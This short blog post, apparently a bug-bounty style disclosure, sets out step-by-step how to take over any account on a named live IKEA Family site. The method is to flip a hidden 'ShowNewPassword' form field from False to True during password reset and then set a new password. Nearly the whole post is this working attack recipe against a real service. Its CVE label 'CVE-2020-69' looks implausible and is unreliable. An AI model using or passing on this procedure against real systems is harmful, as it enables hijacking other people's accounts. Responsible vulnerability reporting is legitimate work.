Hoki Injection CVE-2020-69
Summary:
Attacker can takeover ALL account on Family ikea, with reset pass.Steps To Reproduce:
https://family.ikea.eg/en-us/login/forgotpassword
- first enter your email
- go to inspect element, and search this data:
<input data-val="true" data-val-required="The ShowNewPassword field is required." id="ShowNewPassword" name="ShowNewPassword" type="hidden" value="False">edited value=false to value=true like this:
<input data-val="true" data-val-required="The ShowNewPassword field is required." id="ShowNewPassword" name="ShowNewPassword" type="hidden" value="True">- click next
- put your new password.
- confirm and account takeover
« Terbaru
Postingan Lebih Baru
Terlama »
Postingan Lama